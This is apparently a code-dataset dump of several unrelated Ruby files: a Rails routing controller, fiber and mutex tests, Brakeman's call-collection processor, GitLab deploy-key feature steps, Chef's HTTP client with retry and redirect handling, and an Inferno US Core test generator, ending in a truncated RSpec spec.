| 41.819444 | 269 | 0.727238 |
113b1964c4834967b60db8b9ff2f56e80ff09440 | 2,139 |
class OutdoorController < ApplicationController
skip_before_filter :authorize
include OutdoorHelper
def index
@buildings = Building.order(:name)
@nearest_locations = Location.all
# Google Map
@users = [Building.first]
@hash = Gmaps4rails.build_markers(@users) do |user, marker|
marker.lat 42.366629
marker.lng -71.259510
# marker.infowindow user.description
end
## autocomplete
@building_names = auto_complete(params)
end
def routing
## Get locations from params
# .to_s == "" is to test nil or empty
if params[:from].to_s != "" && params[:to].to_s != "" && params[:from] != params[:to]
if params[:from] .start_with?('(')
@location_pickup = get_location_pickup(params[:from])
else
@building_from = find_building_or_parking_lot(params[:from])
end
@building_to = find_building_or_parking_lot(params[:to])
else
flash[:notice] = "Sorry, we don't know the place you were looking for."
redirect_to outdoor_url
return
end
# get the start and end location for the algorithm
check_graph
begin
locations_start = get_locations_start_or_end(@location_pickup, @building_from)
locations_end = get_locations_start_or_end(@building_to)
location_start, location_end = get_location_start_and_end(@@astar, locations_start, locations_end)
rescue RuntimeError => e
flash[:notice] = "Sorry, we can't find the place you were looking for."
redirect_to outdoor_url
return
end
## run algorithm
@locations = @@astar.astar(location_start, location_end)
if @locations.nil?
flash[:notice] = "Sorry, we can't find a way."
redirect_to outdoor_url
return
end
@paths = locations_to_paths(@locations)
## Google map
@hash = gmap_build_markers(@locations, @paths)
## auto complete
@building_names = auto_complete(params)
##
@directed_from = "#{params[:from]},,#{params[:to]}"
end # End of Action
private
def check_graph
@@astar ||= create_graph
end
end # End of Controller
| 25.164706 | 104 | 0.661992 |
0842427760ffdf43e54e06b3c055751a90e3167c | 3,804 | # frozen_string_literal: true
require 'test/unit'
require_relative 'scheduler'
class TestFiberMutex < Test::Unit::TestCase
def test_mutex_synchronize
mutex = Mutex.new
thread = Thread.new do
scheduler = Scheduler.new
Fiber.set_scheduler scheduler
Fiber.schedule do
assert_not_predicate Fiber, :blocking?
mutex.synchronize do
assert_not_predicate Fiber, :blocking?
end
end
end
thread.join
end
def test_mutex_interleaved_locking
mutex = Mutex.new
thread = Thread.new do
scheduler = Scheduler.new
Fiber.set_scheduler scheduler
Fiber.schedule do
mutex.lock
sleep 0.1
mutex.unlock
end
Fiber.schedule do
mutex.lock
sleep 0.1
mutex.unlock
end
scheduler.run
end
thread.join
end
def test_mutex_thread
mutex = Mutex.new
mutex.lock
thread = Thread.new do
scheduler = Scheduler.new
Fiber.set_scheduler scheduler
Fiber.schedule do
mutex.lock
sleep 0.1
mutex.unlock
end
scheduler.run
end
sleep 0.1
mutex.unlock
thread.join
end
def test_mutex_fiber_raise
mutex = Mutex.new
ran = false
main = Thread.new do
mutex.lock
thread = Thread.new do
scheduler = Scheduler.new
Fiber.set_scheduler scheduler
f = Fiber.schedule do
assert_raise_with_message(RuntimeError, "bye") do
mutex.lock
end
ran = true
end
Fiber.schedule do
f.raise "bye"
end
end
thread.join
end
main.join # causes mutex to be released
assert_equal false, mutex.locked?
assert_equal true, ran
end
def test_condition_variable
mutex = Mutex.new
condition = ConditionVariable.new
signalled = 0
Thread.new do
scheduler = Scheduler.new
Fiber.set_scheduler scheduler
Fiber.schedule do
mutex.synchronize do
3.times do
condition.wait(mutex)
signalled += 1
end
end
end
Fiber.schedule do
3.times do
mutex.synchronize do
condition.signal
end
sleep 0.1
end
end
scheduler.run
end.join
assert_equal 3, signalled
end
def test_queue
queue = Queue.new
processed = 0
thread = Thread.new do
scheduler = Scheduler.new
Fiber.set_scheduler scheduler
Fiber.schedule do
3.times do |i|
queue << i
sleep 0.1
end
queue.close
end
Fiber.schedule do
while item = queue.pop
processed += 1
end
end
scheduler.run
end
thread.join
assert_equal 3, processed
end
def test_queue_pop_waits
queue = Queue.new
running = false
thread = Thread.new do
scheduler = Scheduler.new
Fiber.set_scheduler scheduler
result = nil
Fiber.schedule do
result = queue.pop
end
running = true
scheduler.run
result
end
Thread.pass until running
sleep 0.1
queue << :done
assert_equal :done, thread.value
end
def test_mutex_deadlock
error_pattern = /No live threads left. Deadlock\?/
assert_in_out_err %W[-I#{__dir__} -], <<-RUBY, ['in synchronize'], error_pattern, success: false
require 'scheduler'
mutex = Mutex.new
thread = Thread.new do
scheduler = Scheduler.new
Fiber.set_scheduler scheduler
Fiber.schedule do
mutex.synchronize do
puts 'in synchronize'
Fiber.yield
end
end
mutex.lock
end
thread.join
RUBY
end
end
| 17.21267 | 100 | 0.590694 |
7a7bc9b27d24f95bfdf8f57f6b33a4bc5eb013a2 | 50 | json.array! @alerts, partial: 'alert', as: :alert
| 25 | 49 | 0.68 |
03590648ddfd16c13143119efd532385512ab928 | 4,538 | require 'brakeman/processors/lib/basic_processor'
class Brakeman::FindAllCalls < Brakeman::BasicProcessor
attr_reader :calls
def initialize tracker
super
@current_class = nil
@current_method = nil
@in_target = false
@calls = []
@cache = {}
end
#Process the given source. Provide either class and method being searched
#or the template. These names are used when reporting results.
def process_source exp, opts
@current_class = opts[:class]
@current_method = opts[:method]
@current_template = opts[:template]
@current_file = opts[:file]
process exp
end
#Process body of method
def process_methdef exp
process_all exp.body
end
#Process body of method
def process_selfdef exp
process_all exp.body
end
#Process body of block
def process_rlist exp
process_all exp
end
def process_call exp
@calls << create_call_hash(exp)
exp
end
def process_call_with_block exp
call = exp.block_call
if call.node_type == :call
call_hash = create_call_hash(call)
call_hash[:block] = exp.block
call_hash[:block_args] = exp.block_args
@calls << call_hash
process exp.block
else
#Probably a :render call with block
process call
process exp.block
end
exp
end
alias process_iter process_call_with_block
#Calls to render() are converted to s(:render, ...) but we would
#like them in the call cache still for speed
def process_render exp
process exp.last if sexp? exp.last
@calls << { :target => nil,
:method => :render,
:call => exp,
:nested => false,
:location => make_location }
exp
end
#Technically, `` is call to Kernel#`
#But we just need them in the call cache for speed
def process_dxstr exp
process exp.last if sexp? exp.last
@calls << { :target => nil,
:method => :`,
:call => exp,
:nested => false,
:location => make_location }
exp
end
#:"string" is equivalent to "string".to_sym
def process_dsym exp
exp.each { |arg| process arg if sexp? arg }
@calls << { :target => nil,
:method => :literal_to_sym,
:call => exp,
:nested => false,
:location => make_location }
exp
end
# Process a dynamic regex like a call
def process_dregx exp
exp.each { |arg| process arg if sexp? arg }
@calls << { :target => nil,
:method => :brakeman_regex_interp,
:call => exp,
:nested => false,
:location => make_location }
exp
end
#Process an assignment like a call
def process_attrasgn exp
process_call exp
end
private
#Gets the target of a call as a Symbol
#if possible
def get_target exp
if sexp? exp
case exp.node_type
when :ivar, :lvar, :const, :lit
exp.value
when :true, :false
exp[0]
when :colon2
class_name exp
when :self
@current_class || @current_module || nil
else
exp
end
else
exp
end
end
#Returns method chain as an array
#For example, User.human.alive.all would return [:User, :human, :alive, :all]
def get_chain call
if node_type? call, :call, :attrasgn
get_chain(call.target) + [call.method]
elsif call.nil?
[]
else
[get_target(call)]
end
end
def make_location
if @current_template
key = [@current_template, @current_file]
cached = @cache[key]
return cached if cached
@cache[key] = { :type => :template,
:template => @current_template,
:file => @current_file }
else
key = [@current_class, @current_method, @current_file]
cached = @cache[key]
return cached if cached
@cache[key] = { :type => :class,
:class => @current_class,
:method => @current_method,
:file => @current_file }
end
end
#Return info hash for a call Sexp
def create_call_hash exp
target = get_target exp.target
if call? target
already_in_target = @in_target
@in_target = true
process target
@in_target = already_in_target
end
method = exp.method
process_call_args exp
{ :target => target,
:method => method,
:call => exp,
:nested => @in_target,
:chain => get_chain(exp),
:location => make_location }
end
end
| 22.136585 | 79 | 0.598281 |
edf78f62f9a213f21b10ce8abb7243150ea1c6b9 | 2,631 | class Spinach::Features::ProjectDeployKeys < Spinach::FeatureSteps
include SharedAuthentication
include SharedProject
include SharedPaths
step 'project has deploy key' do
create(:deploy_keys_project, project: @project)
end
step 'I should see project deploy key' do
page.within '.deploy-keys' do
expect(page).to have_content deploy_key.title
end
end
step 'I should see other project deploy key' do
page.within '.deploy-keys' do
expect(page).to have_content other_deploy_key.title
end
end
step 'I should see public deploy key' do
page.within '.deploy-keys' do
expect(page).to have_content public_deploy_key.title
end
end
step 'I click \'New Deploy Key\'' do
click_link 'New Deploy Key'
end
step 'I submit new deploy key' do
fill_in "deploy_key_title", with: "laptop"
fill_in "deploy_key_key", with: "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzrEJUIR6Y03TCE9rIJ+GqTBvgb8t1jI9h5UBzCLuK4VawOmkLornPqLDrGbm6tcwM/wBrrLvVOqi2HwmkKEIecVO0a64A4rIYScVsXIniHRS6w5twyn1MD3sIbN+socBDcaldECQa2u1dI3tnNVcs8wi77fiRe7RSxePsJceGoheRQgC8AZ510UdIlO+9rjIHUdVN7LLyz512auAfYsgx1OfablkQ/XJcdEwDNgi9imI6nAXhmoKUm1IPLT2yKajTIC64AjLOnE0YyCh6+7RFMpiMyu1qiOCpdjYwTgBRiciNRZCH8xIedyCoAmiUgkUT40XYHwLuwiPJICpkAzp7Q== user@laptop"
click_button "Add key"
end
step 'I should be on deploy keys page' do
expect(current_path).to eq namespace_project_deploy_keys_path(@project.namespace, @project)
end
step 'I should see newly created deploy key' do
page.within '.deploy-keys' do
expect(page).to have_content(deploy_key.title)
end
end
step 'other projects have deploy keys' do
@second_project = create(:empty_project, namespace: create(:group))
@second_project.team << [current_user, :master]
create(:deploy_keys_project, project: @second_project)
@third_project = create(:empty_project, namespace: create(:group))
@third_project.team << [current_user, :master]
create(:deploy_keys_project, project: @third_project, deploy_key: @second_project.deploy_keys.first)
end
step 'I should only see the same deploy key once' do
page.within '.deploy-keys' do
expect(page).to have_selector('ul li', count: 1)
end
end
step 'public deploy key exists' do
create(:deploy_key, public: true)
end
step 'I click attach deploy key' do
page.within '.deploy-keys' do
click_link 'Enable'
end
end
protected
def deploy_key
@project.deploy_keys.last
end
def other_deploy_key
@second_project.deploy_keys.last
end
def public_deploy_key
DeployKey.are_public.last
end
end
| 29.897727 | 430 | 0.749525 |
26e10c64297c0444ae0b1b93c17a59ed428e3263 | 1,524 | require 'test_helper'
class TranscriptLinesControllerTest < ActionController::TestCase
setup do
@transcript_line = transcript_lines(:one)
end
test "should get index" do
get :index
assert_response :success
assert_not_nil assigns(:transcript_lines)
end
test "should create transcript_line" do
assert_difference('TranscriptLine.count') do
post :create, transcript_line: { end_time: @transcript_line.end_time, notes: @transcript_line.notes, sequence: @transcript_line.sequence, speaker_id: @transcript_line.speaker_id, start_time: @transcript_line.start_time, text: @transcript_line.text, transcript_id: @transcript_line.transcript_id, transcript_status_id: @transcript_line.transcript_status_id }
end
assert_response 201
end
test "should show transcript_line" do
get :show, id: @transcript_line
assert_response :success
end
test "should update transcript_line" do
put :update, id: @transcript_line, transcript_line: { end_time: @transcript_line.end_time, notes: @transcript_line.notes, sequence: @transcript_line.sequence, speaker_id: @transcript_line.speaker_id, start_time: @transcript_line.start_time, text: @transcript_line.text, transcript_id: @transcript_line.transcript_id, transcript_status_id: @transcript_line.transcript_status_id }
assert_response 204
end
test "should destroy transcript_line" do
assert_difference('TranscriptLine.count', -1) do
delete :destroy, id: @transcript_line
end
assert_response 204
end
end
| 38.1 | 382 | 0.778871 |
016e81d12ceafd967bebf55f0a3a09e3b197e76f | 19,091 | #--
# Author:: Adam Jacob (<[email protected]>)
# Author:: Thom May (<[email protected]>)
# Author:: Nuo Yan (<[email protected]>)
# Author:: Christopher Brown (<[email protected]>)
# Author:: Christopher Walters (<[email protected]>)
# Author:: Daniel DeLeo (<[email protected]>)
# Copyright:: Copyright 2009-2018, Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "tempfile"
require "net/https"
require "uri"
require "chef/http/basic_client"
require "chef/monkey_patches/net_http"
require "chef/config"
require "chef/platform/query_helpers"
require "chef/exceptions"
class Chef
# == Chef::HTTP
# Basic HTTP client, with support for adding features via middleware
class HTTP
# Class for applying middleware behaviors to streaming
# responses. Collects stream handlers (if any) from each
# middleware. When #handle_chunk is called, the chunk gets
# passed to all handlers in turn for processing.
class StreamHandler
def initialize(middlewares, response)
middlewares = middlewares.flatten
@stream_handlers = []
middlewares.each do |middleware|
stream_handler = middleware.stream_response_handler(response)
@stream_handlers << stream_handler unless stream_handler.nil?
end
end
def handle_chunk(next_chunk)
# stream handlers handle responses so must be applied in reverse order
# (same as #apply_stream_complete_middleware or #apply_response_midddleware)
@stream_handlers.reverse.inject(next_chunk) do |chunk, handler|
Chef::Log.trace("Chef::HTTP::StreamHandler calling #{handler.class}#handle_chunk")
handler.handle_chunk(chunk)
end
end
end
def self.middlewares
@middlewares ||= []
end
def self.use(middleware_class)
middlewares << middleware_class
end
attr_reader :url
attr_reader :sign_on_redirect
attr_reader :redirect_limit
attr_reader :options
attr_reader :middlewares
# [Boolean] if we're doing keepalives or not
attr_reader :keepalives
# Create a HTTP client object. The supplied +url+ is used as the base for
# all subsequent requests. For example, when initialized with a base url
# http://localhost:4000, a call to +get+ with 'nodes' will make an
# HTTP GET request to http://localhost:4000/nodes
def initialize(url, options = {})
@url = url
@default_headers = options[:headers] || {}
@sign_on_redirect = true
@redirects_followed = 0
@redirect_limit = 10
@keepalives = options[:keepalives] || false
@options = options
@middlewares = []
self.class.middlewares.each do |middleware_class|
@middlewares << middleware_class.new(options)
end
end
# Send an HTTP HEAD request to the path
#
# === Parameters
# path:: path part of the request URL
def head(path, headers = {})
request(:HEAD, path, headers)
end
# Send an HTTP GET request to the path
#
# === Parameters
# path:: The path to GET
def get(path, headers = {})
request(:GET, path, headers)
end
# Send an HTTP PUT request to the path
#
# === Parameters
# path:: path part of the request URL
def put(path, json, headers = {})
request(:PUT, path, headers, json)
end
# Send an HTTP POST request to the path
#
# === Parameters
# path:: path part of the request URL
def post(path, json, headers = {})
request(:POST, path, headers, json)
end
# Send an HTTP DELETE request to the path
#
# === Parameters
# path:: path part of the request URL
def delete(path, headers = {})
request(:DELETE, path, headers)
end
# Makes an HTTP request to +path+ with the given +method+, +headers+, and
# +data+ (if applicable).
def request(method, path, headers = {}, data = false)
http_attempts ||= 0
url = create_url(path)
processed_method, url, processed_headers, processed_data = apply_request_middleware(method, url, headers, data)
response, rest_request, return_value = send_http_request(processed_method, url, processed_headers, processed_data)
response, rest_request, return_value = apply_response_middleware(response, rest_request, return_value)
response.error! unless success_response?(response)
return_value
rescue Net::HTTPServerException => e
http_attempts += 1
response = e.response
if response.kind_of?(Net::HTTPNotAcceptable) && version_retries - http_attempts > 0
Chef::Log.trace("Negotiating protocol version with #{url}, retry #{http_attempts}/#{version_retries}")
retry
else
raise
end
rescue Exception => exception
log_failed_request(response, return_value) unless response.nil?
if exception.respond_to?(:chef_rest_request=)
exception.chef_rest_request = rest_request
end
raise
end
def streaming_request_with_progress(path, headers = {}, tempfile = nil, &progress_block)
http_attempts ||= 0
url = create_url(path)
response, rest_request, return_value = nil, nil, nil
data = nil
method = :GET
method, url, processed_headers, data = apply_request_middleware(method, url, headers, data)
response, rest_request, return_value = send_http_request(method, url, processed_headers, data) do |http_response|
if http_response.kind_of?(Net::HTTPSuccess)
tempfile = stream_to_tempfile(url, http_response, tempfile, &progress_block)
end
apply_stream_complete_middleware(http_response, rest_request, return_value)
end
return nil if response.kind_of?(Net::HTTPRedirection)
unless response.kind_of?(Net::HTTPSuccess)
response.error!
end
tempfile
rescue Net::HTTPServerException => e
http_attempts += 1
response = e.response
if response.kind_of?(Net::HTTPNotAcceptable) && version_retries - http_attempts > 0
Chef::Log.trace("Negotiating protocol version with #{url}, retry #{http_attempts}/#{version_retries}")
retry
else
raise
end
rescue Exception => e
log_failed_request(response, return_value) unless response.nil?
if e.respond_to?(:chef_rest_request=)
e.chef_rest_request = rest_request
end
raise
end
# Makes a streaming download request, streaming the response body to a
# tempfile. If a block is given, the tempfile is passed to the block and
# the tempfile will automatically be unlinked after the block is executed.
#
# If no block is given, the tempfile is returned, which means it's up to
# you to unlink the tempfile when you're done with it.
#
# @yield [tempfile] block to process the tempfile
# @yieldparams [tempfile<Tempfile>] tempfile
def streaming_request(path, headers = {}, tempfile = nil)
http_attempts ||= 0
url = create_url(path)
response, rest_request, return_value = nil, nil, nil
data = nil
method = :GET
method, url, processed_headers, data = apply_request_middleware(method, url, headers, data)
response, rest_request, return_value = send_http_request(method, url, processed_headers, data) do |http_response|
if http_response.kind_of?(Net::HTTPSuccess)
tempfile = stream_to_tempfile(url, http_response, tempfile)
end
apply_stream_complete_middleware(http_response, rest_request, return_value)
end
return nil if response.kind_of?(Net::HTTPRedirection)
unless response.kind_of?(Net::HTTPSuccess)
response.error!
end
if block_given?
begin
yield tempfile
ensure
tempfile && tempfile.close!
end
end
tempfile
rescue Net::HTTPServerException => e
http_attempts += 1
response = e.response
if response.kind_of?(Net::HTTPNotAcceptable) && version_retries - http_attempts > 0
Chef::Log.trace("Negotiating protocol version with #{url}, retry #{http_attempts}/#{version_retries}")
retry
else
raise
end
rescue Exception => e
log_failed_request(response, return_value) unless response.nil?
if e.respond_to?(:chef_rest_request=)
e.chef_rest_request = rest_request
end
raise
end
def http_client(base_url = nil)
base_url ||= url
if keepalives && !base_url.nil?
# only reuse the http_client if we want keepalives and have a base_url
@http_client ||= {}
# the per-host per-port cache here gets peristent connections correct when
# redirecting to different servers
if base_url.is_a?(String) # sigh, this kind of abuse can't happen with strongly typed languages
@http_client[base_url] ||= build_http_client(base_url)
else
@http_client[base_url.host] ||= {}
@http_client[base_url.host][base_url.port] ||= build_http_client(base_url)
end
else
build_http_client(base_url)
end
end
# DEPRECATED: This is only kept around to provide access to cache control data in
# lib/chef/provider/remote_file/http.rb
# FIXME: Find a better API.
def last_response
@last_response
end
private
# @api private
def build_http_client(base_url)
if chef_zero_uri?(base_url)
# PERFORMANCE CRITICAL: *MUST* lazy require here otherwise we load up webrick
# via chef-zero and that hits DNS (at *require* time) which may timeout,
# when for most knife/chef-client work we never need/want this loaded.
unless defined?(SocketlessChefZeroClient)
require "chef/http/socketless_chef_zero_client"
end
SocketlessChefZeroClient.new(base_url)
else
BasicClient.new(base_url, ssl_policy: Chef::HTTP::APISSLPolicy, keepalives: keepalives)
end
end
# @api private
def create_url(path)
return path if path.is_a?(URI)
if path =~ /^(http|https|chefzero):\/\//i
URI.parse(path)
elsif path.nil? || path.empty?
URI.parse(@url)
else
# The regular expressions used here are to make sure '@url' does not have
# any trailing slashes and 'path' does not have any leading slashes. This
# way they are always joined correctly using just one slash.
URI.parse(@url.gsub(%r{/+$}, "") + "/" + path.gsub(%r{^/+}, ""))
end
end
# @api private
def apply_request_middleware(method, url, headers, data)
middlewares.inject([method, url, headers, data]) do |req_data, middleware|
Chef::Log.trace("Chef::HTTP calling #{middleware.class}#handle_request")
middleware.handle_request(*req_data)
end
end
# @api private
def apply_response_middleware(response, rest_request, return_value)
middlewares.reverse.inject([response, rest_request, return_value]) do |res_data, middleware|
Chef::Log.trace("Chef::HTTP calling #{middleware.class}#handle_response")
middleware.handle_response(*res_data)
end
end
# @api private
def apply_stream_complete_middleware(response, rest_request, return_value)
middlewares.reverse.inject([response, rest_request, return_value]) do |res_data, middleware|
Chef::Log.trace("Chef::HTTP calling #{middleware.class}#handle_stream_complete")
middleware.handle_stream_complete(*res_data)
end
end
# @api private
def log_failed_request(response, return_value)
return_value ||= {}
error_message = "HTTP Request Returned #{response.code} #{response.message}: "
error_message << (return_value["error"].respond_to?(:join) ? return_value["error"].join(", ") : return_value["error"].to_s)
Chef::Log.info(error_message)
end
# @api private
def success_response?(response)
response.kind_of?(Net::HTTPSuccess) || response.kind_of?(Net::HTTPRedirection)
end
# Runs a synchronous HTTP request, with no middleware applied (use #request
# to have the middleware applied). The entire response will be loaded into memory.
# @api private
def send_http_request(method, url, base_headers, body, &response_handler)
retrying_http_errors(url) do
headers = build_headers(method, url, base_headers, body)
client = http_client(url)
return_value = nil
if block_given?
request, response = client.request(method, url, body, headers, &response_handler)
else
request, response = client.request(method, url, body, headers) { |r| r.read_body }
return_value = response.read_body
end
@last_response = response
if response.kind_of?(Net::HTTPSuccess)
[response, request, return_value]
elsif response.kind_of?(Net::HTTPNotModified) # Must be tested before Net::HTTPRedirection because it's subclass.
[response, request, false]
elsif redirect_location = redirected_to(response)
if [:GET, :HEAD].include?(method)
follow_redirect do
redirected_url = url + redirect_location
if http_disable_auth_on_redirect
new_headers = build_headers(method, redirected_url, headers, body)
new_headers.delete("Authorization") if url.host != redirected_url.host
send_http_request(method, redirected_url, new_headers, body, &response_handler)
else
send_http_request(method, redirected_url, headers, body, &response_handler)
end
end
else
raise Exceptions::InvalidRedirect, "#{method} request was redirected from #{url} to #{redirect_location}. Only GET and HEAD support redirects."
end
else
[response, request, nil]
end
end
end
# Wraps an HTTP request with retry logic.
# === Arguments
# url:: URL of the request, used for error messages
# @api private
def retrying_http_errors(url)
http_attempts = 0
begin
loop do
http_attempts += 1
response, request, return_value = yield
# handle HTTP 50X Error
if response.kind_of?(Net::HTTPServerError) && !Chef::Config.local_mode
if http_retry_count - http_attempts + 1 > 0
sleep_time = 1 + (2**http_attempts) + rand(2**http_attempts)
Chef::Log.error("Server returned error #{response.code} for #{url}, retrying #{http_attempts}/#{http_retry_count} in #{sleep_time}s")
sleep(sleep_time)
redo
end
end
return [response, request, return_value]
end
rescue SocketError, Errno::ETIMEDOUT, Errno::ECONNRESET => e
if http_retry_count - http_attempts + 1 > 0
Chef::Log.error("Error connecting to #{url}, retry #{http_attempts}/#{http_retry_count}")
sleep(http_retry_delay)
retry
end
e.message.replace "Error connecting to #{url} - #{e.message}"
raise e
rescue Errno::ECONNREFUSED
if http_retry_count - http_attempts + 1 > 0
Chef::Log.error("Connection refused connecting to #{url}, retry #{http_attempts}/#{http_retry_count}")
sleep(http_retry_delay)
retry
end
raise Errno::ECONNREFUSED, "Connection refused connecting to #{url}, giving up"
rescue Timeout::Error
if http_retry_count - http_attempts + 1 > 0
Chef::Log.error("Timeout connecting to #{url}, retry #{http_attempts}/#{http_retry_count}")
sleep(http_retry_delay)
retry
end
raise Timeout::Error, "Timeout connecting to #{url}, giving up"
rescue OpenSSL::SSL::SSLError => e
if (http_retry_count - http_attempts + 1 > 0) && !e.message.include?("certificate verify failed")
Chef::Log.error("SSL Error connecting to #{url}, retry #{http_attempts}/#{http_retry_count}")
sleep(http_retry_delay)
retry
end
raise OpenSSL::SSL::SSLError, "SSL Error connecting to #{url} - #{e.message}"
end
end
def version_retries
@version_retries ||= options[:version_class].possible_requests
end
# @api private
def http_retry_delay
config[:http_retry_delay]
end
# @api private
def http_retry_count
config[:http_retry_count]
end
# @api private
def http_disable_auth_on_redirect
config[:http_disable_auth_on_redirect]
end
# @api private
def config
Chef::Config
end
# @api private
def follow_redirect
raise Chef::Exceptions::RedirectLimitExceeded if @redirects_followed >= redirect_limit
@redirects_followed += 1
Chef::Log.trace("Following redirect #{@redirects_followed}/#{redirect_limit}")
yield
ensure
@redirects_followed = 0
end
# @api private
def chef_zero_uri?(uri)
uri = URI.parse(uri) unless uri.respond_to?(:scheme)
uri.scheme == "chefzero"
end
# @api private
def redirected_to(response)
return nil unless response.kind_of?(Net::HTTPRedirection)
# Net::HTTPNotModified is undesired subclass of Net::HTTPRedirection so test for this
return nil if response.kind_of?(Net::HTTPNotModified)
response["location"]
end
# @api private
def build_headers(method, url, headers = {}, json_body = false)
headers = @default_headers.merge(headers)
headers["Content-Length"] = json_body.bytesize.to_s if json_body
headers.merge!(Chef::Config[:custom_http_headers]) if Chef::Config[:custom_http_headers]
headers
end
# @api private
def stream_to_tempfile(url, response, tf = nil, &progress_block)
content_length = response["Content-Length"]
if tf.nil?
tf = Tempfile.open("chef-rest")
if Chef::Platform.windows?
tf.binmode # required for binary files on Windows platforms
end
end
Chef::Log.trace("Streaming download from #{url} to tempfile #{tf.path}")
# Stolen from http://www.ruby-forum.com/topic/166423
# Kudos to _why!
stream_handler = StreamHandler.new(middlewares, response)
response.read_body do |chunk|
tf.write(stream_handler.handle_chunk(chunk))
yield tf.size, content_length if block_given?
end
tf.close
tf
rescue Exception
tf.close! if tf
raise
end
end
end
| 35.353704 | 155 | 0.659211 |
61728b4ca9474124ff41d772205a7f9075286552 | 7,226 | # frozen_string_literal: true
module Inferno
module Generator
class USCoreUnitTestGenerator
def tests
@tests ||= Hash.new { |hash, key| hash[key] = [] }
end
def generate(sequence, path, module_name)
template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'unit_test.rb.erb')))
class_name = sequence[:class_name]
return if tests[class_name].blank?
if sequence[:resource] == 'MedicationRequest'
tests[class_name] << ERB.new(
File.read(
File.join(__dir__, 'templates', 'unit_tests', 'medication_inclusion_unit_test.rb.erb')
)
).result
end
unit_tests = template.result_with_hash(
class_name: class_name,
tests: tests[class_name],
resource_type: sequence[:resource],
module_name: module_name
)
test_path = File.join(path, 'test')
FileUtils.mkdir_p(test_path) unless File.directory?(test_path)
file_name = File.join(test_path, "#{sequence[:name].downcase}_test.rb")
File.write(file_name, unit_tests)
end
def generate_search_test(
test_key:,
resource_type:,
search_params:,
is_first_search:,
is_fixed_value_search:,
is_status_search:,
has_comparator_tests:,
has_status_searches:,
fixed_value_search_param:,
class_name:,
sequence_name:,
delayed_sequence:,
status_param:
)
template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'search_unit_test.rb.erb')))
resource_var_name = resource_type.underscore
supported_search_params_string =
search_params.keys
.take(search_params.length - 1)
.map { |value| "'#{value}'" }
.join(', ')
test = template.result_with_hash(
test_key: test_key,
resource_type: resource_type,
resource_var_name: resource_var_name,
search_params: search_params,
supported_search_params_string: supported_search_params_string,
search_param_string: search_params_to_string(search_params),
sequence_name: sequence_name,
is_first_search: is_first_search,
is_fixed_value_search: is_fixed_value_search,
is_status_search: is_status_search,
has_comparator_tests: has_comparator_tests,
has_dynamic_search_params: dynamic_search_params(search_params).present?,
has_status_searches: has_status_searches,
fixed_value_search_param: fixed_value_search_param&.dig(:name),
fixed_value_search_string: fixed_value_search_param&.dig(:values)&.map { |value| "'#{value}'" }&.join(', '),
fixed_value_search_path: fixed_value_search_param&.dig(:path),
delayed_sequence: delayed_sequence,
status_param: status_param
)
tests[class_name] << test
end
def generate_authorization_test(test_key:, resource_type:, search_params:, class_name:, sequence_name:)
template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'authorization_unit_test.rb.erb')))
test = template.result_with_hash(
test_key: test_key,
resource_type: resource_type,
search_param_string: search_params_to_string(search_params),
dynamic_search_params: dynamic_search_params(search_params),
sequence_name: sequence_name
)
tests[class_name] << test
end
def generate_resource_read_test(test_key:, resource_type:, class_name:, interaction_test: false)
template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'resource_read_unit_test.rb.erb')))
resource_var_name = resource_type.underscore
test = template.result_with_hash(
test_key: test_key,
resource_type: resource_type,
resource_var_name: resource_var_name,
interaction_test: interaction_test,
no_resources_found_message: no_resources_found_message(interaction_test, resource_type),
wrong_resource_type: resource_type == 'Patient' ? 'Observation' : 'Patient'
)
tests[class_name] << test
end
def generate_chained_search_test(class_name:)
template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'chained_search_unit_test.rb.erb')))
tests[class_name] << template.result
end
def generate_resource_validation_test(test_key:, resource_type:, class_name:, sequence_name:, required_concepts:, profile_uri:)
template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'resource_validation_unit_test.rb.erb')))
resource_var_name = resource_type.underscore
test = template.result_with_hash(
test_key: test_key,
resource_type: resource_type,
resource_var_name: resource_var_name,
concept_paths: path_array_string(required_concepts),
sequence_name: sequence_name,
profile_uri: profile_uri
)
tests[class_name] << test
end
def no_resources_found_message(interaction_test, resource_type)
if interaction_test
"No #{resource_type} resources appear to be available. Please use patients with more information."
else
"No #{resource_type} references found from the prior searches"
end
end
def search_params_to_string(search_params)
search_params.map do |param, value|
if dynamic_search_param? value
dynamic_search_param_string(param, value)
elsif value.start_with? '@'
"'#{param}': #{value}"
elsif value == 'patient'
"'#{param}': @sequence.patient_ids.first"
else
"'#{param}': '#{value}'"
end
end.join(",\n")
end
def dynamic_search_param_string(param, value)
param_info = dynamic_search_param(value)
path = param_info[:resource_path]
variable_name = param_info[:variable_name]
variable_name.gsub!('[patient]', '[@sequence.patient_ids.first]')
"'#{param}': @sequence.get_value_for_search_param(@sequence.resolve_element_from_path(#{variable_name}, '#{path}'))"
end
def dynamic_search_param?(param_value)
param_value.start_with? 'get_value_for_search_param'
end
def dynamic_search_params(search_params)
search_params
.select { |_param, value| dynamic_search_param?(value) }
.transform_values { |value| dynamic_search_param(value) }
end
# From a string like:
# get_value_for_search_param(resolve_element_from_path(@careplan_ary, 'category'))
# this method extracts the variable name '@careplan_ary' and the path 'category'
def dynamic_search_param(param_value)
match = param_value.match(/(@[^,]+).*'([\w\.]+)'/)
{
variable_name: match[1],
resource_path: match[2]
}
end
def path_array_string(paths)
paths.map { |path| "'#{path}'" }.join ', '
end
end
end
end
| 37.440415 | 133 | 0.649045 |
f76548648695ed6f4c7456dfbbdf0949c149020c | 60 | module ConcertoWeather
module ApplicationHelper
end
end
| 12 | 26 | 0.833333 |
f744ee3c7a3e201f37d5b496fd35a35cd48d2b9e | 855 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
describe "Kernel#instance_variables" do
describe "immediate values" do
it "returns an empty array if no instance variables are defined" do
0.instance_variables.should == []
end
